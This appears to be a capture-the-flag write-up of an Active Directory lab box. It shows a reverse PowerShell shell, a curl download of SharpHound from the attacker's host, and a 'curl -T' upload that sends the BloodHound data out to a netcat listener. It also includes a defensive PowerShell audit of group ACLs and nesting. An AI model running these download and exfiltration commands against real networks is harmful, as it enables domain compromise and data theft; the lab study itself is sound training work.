listening on [any] 10088 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57496
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\awallace\Documents> whoami

acute\awallace

Once inside, 389 is listening but cannot be reached from outside, so run BloodHound to see what is actually going on in this domain.

PS C:\Users\awallace\Documents> netstat -ano|findstr 389
netstat -ano|findstr 389
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 680
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2444
curl 10.10.16.8/SharpHound.exe -o SharpHound.exe
PS C:\Users\awallace\Documents> .\SharpHound.exe
.\SharpHound.exe
2025-03-11T15:38:19.5992713+00:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2025-03-11T15:38:19.6773937+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.6930183+00:00|INFORMATION|Initializing SharpHound at 15:38 on 11/03/2025
2025-03-11T15:38:19.7867734+00:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for acute.local : ATSSERVER.acute.local
2025-03-11T15:38:19.8023986+00:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.8962192+00:00|INFORMATION|Beginning LDAP search for acute.local
2025-03-11T15:38:19.9117741+00:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-11T15:38:19.9117741+00:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-11T15:38:50.2656371+00:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2025-03-11T15:39:03.4265787+00:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-03-11T15:39:03.4422041+00:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Status: 113 objects finished (+113 2.627907)/s -- Using 43 MB RAM
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Enumeration finished in 00:00:43.6059014
2025-03-11T15:39:03.5515810+00:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
75 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-03-11T15:39:03.5515810+00:00|INFORMATION|SharpHound Enumeration Completed at 15:39 on 11/03/2025! Happy Graphing!

Exfiltrate it:

PS C:\Users\awallace\Documents> cmd /c curl -T ./20250311153902_BloodHound.zip  10.10.16.8:81
cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13348 0 0 100 13348 0 2832 0:00:04 0:00:04 --:--:-- 2832
└─$ nc -lvnp 81 > blood.zip  
listening on [any] 81 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57555

Then strip the HTTP request headers that curl prepended to the file.

Import it into BloodHound; I want to see what this Lois really is.

Found lhopkins: damn, it turns out she has GenericAll on Site_Admin. Game over.

And Site_Admin itself is a member of Domain Admins, so that settles it.

lhopkins has GenericAll on Site_Admin, which explains why she can only add users to Site_Admin.
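The two conditions BloodHound exposed here, an ordinary user holding GenericAll on a group and that group being nested in Domain Admins, can be checked without BloodHound. The PowerShell below is an added example, not the writeup's or the box's own code; it assumes the ActiveDirectory (RSAT) module and a caller that can read the domain, and the identity-filter pattern is an assumed default.

```powershell
# Added example, not from the original writeup. Uses the ActiveDirectory module to
# report (1) principals with control rights over a group and (2) groups nested,
# directly or indirectly, inside a privileged group such as Domain Admins.
# Assumptions: RSAT AD module is installed; the ignore pattern is an illustrative default.
Import-Module ActiveDirectory

# schemaIDGUID of the "member" attribute: WriteProperty scoped to it is enough to add
# members even without GenericAll, so it is reported too.
$MemberAttributeGuid = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'
# Identities expected to control any group; everything else is worth a look.
$IgnoreIdentityPattern = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\(Administrators|Account Operators)|.*\\(Domain Admins|Enterprise Admins))$'

function Get-GroupControlRights {
    param([Parameter(Mandatory)][string]$GroupName)
    $group = Get-ADGroup -Identity $GroupName
    $acl = Get-Acl -Path "AD:\$($group.DistinguishedName)"
    $R = [System.DirectoryServices.ActiveDirectoryRights]
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -match $IgnoreIdentityPattern) { continue }
        $rights = $ace.ActiveDirectoryRights
        # WriteProperty on all attributes (empty GUID) or on "member" specifically.
        $canAddMembers = $rights.HasFlag($R::WriteProperty) -and
            ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $MemberAttributeGuid)
        if ($rights.HasFlag($R::GenericAll) -or $rights.HasFlag($R::WriteDacl) -or
            $rights.HasFlag($R::WriteOwner) -or $canAddMembers) {
            [pscustomobject]@{
                Group     = $group.Name
                Identity  = $ace.IdentityReference.Value
                Rights    = $rights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-NestedGroups {
    param([Parameter(Mandatory)][string]$GroupName)
    # Breadth-first walk over group members; each nested group inherits the top
    # group's rights, so control over it is control over the top group.
    $seen = @{}
    $queue = [System.Collections.Generic.Queue[string]]::new()
    $queue.Enqueue($GroupName)
    while ($queue.Count -gt 0) {
        $current = $queue.Dequeue()
        foreach ($m in Get-ADGroupMember -Identity $current) {
            if ($m.objectClass -ne 'group' -or $seen.ContainsKey($m.distinguishedName)) { continue }
            $seen[$m.distinguishedName] = $true
            [pscustomobject]@{ Parent = $current; NestedGroup = $m.name }
            $queue.Enqueue($m.distinguishedName)
        }
    }
}

# On the domain in this writeup this should list Site_Admin under Domain Admins and
# lhopkins with GenericAll on Site_Admin.
$nested = @(Get-NestedGroups -GroupName 'Domain Admins')
$nested | Format-Table -AutoSize
foreach ($g in @('Domain Admins') + $nested.NestedGroup) {
    Get-GroupControlRights -GroupName $g | Format-Table -AutoSize
}
```

Any row naming a non-administrative identity is a path to Domain Admins that a group listing like net group will never show.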


A decent box, but the final step the author set up is pretty dumb, and the information left about Lois is so confusing that it is easy to go off track; half of it comes down to guessing.